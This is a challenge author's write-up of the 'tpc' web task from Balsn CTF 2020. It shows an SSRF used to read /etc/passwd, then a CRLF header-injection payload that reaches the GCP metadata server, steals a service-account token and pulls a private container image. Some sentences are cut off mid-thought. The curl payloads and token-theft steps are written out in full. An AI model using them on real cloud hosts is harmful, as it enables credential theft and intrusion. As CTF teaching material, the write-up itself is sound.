tpc is one of web challenges in Balsn CTF 2020.
As a reviewer of challenges, I would like to share my solution.
- Category: Web
- Solved: 33
- Author: ysc
Flag is in the working directory
At first, what we got was only a site that would query a site you assigned.
Obviously, there is an SSRF vulnerability.
We can try some queries like
file:///etc/passwd to check we can arbitrarily read local files.
Then, I read some useful files.
/usr/local/bin/python /usr/local/bin/gunicorn main-dc1e2f5f7a4f359bb5ce1317a:app --bind 0.0.0.0:8000 --workers 3 --worker-tmp-dir /dev/shm --worker-class gevent --access-logfile - --error-logfile -
until now, I know the name and version of python script, I know the current path, and I know it's a GCP instance.
Thus, I can dump the
It should be noticed that there is a Header Injection vulnerability in urllib in this version.
Anyway, our target should be the GCP metadata server.
However, if we directly access the server like below, we would receive an error page.
$ curl 'http://126.96.36.199:8000/query?site=http://169.254.169.254/computeMetadata/v1/instance/'
According to GCP docs, we need to access the server with a header
So, I just need to utilize the urllib vulnerability, then the server would be accessible.
With the following payload, we can read all of the metadata.
$ curl 'http://188.8.131.52:8000/query?site=http://169.254.169.254/computeMetadata/v1/instance/?q=%20HTTP/1.1%0D%0AMetadata-Flavor:%20Google%0D%0AHeader:%0D%0A'
With token in
computeMetadata/v1/instance/service-accounts/default/token on metadata server, we can execute some GCP APIs.
Also, we can found the image name in
Therefore, I use the token to pull the image on GCR. (Google Cloud Registry)
$ docker login -u oauth2accesstoken -p <token> asia.gcr.io
And just running an instance from the image, we can reach the flag.
file:///proc/self/environ, we can notice a variable called
At first, I thought it is something leaked.
However, it just a setting inheriting from the python image like this article mentions.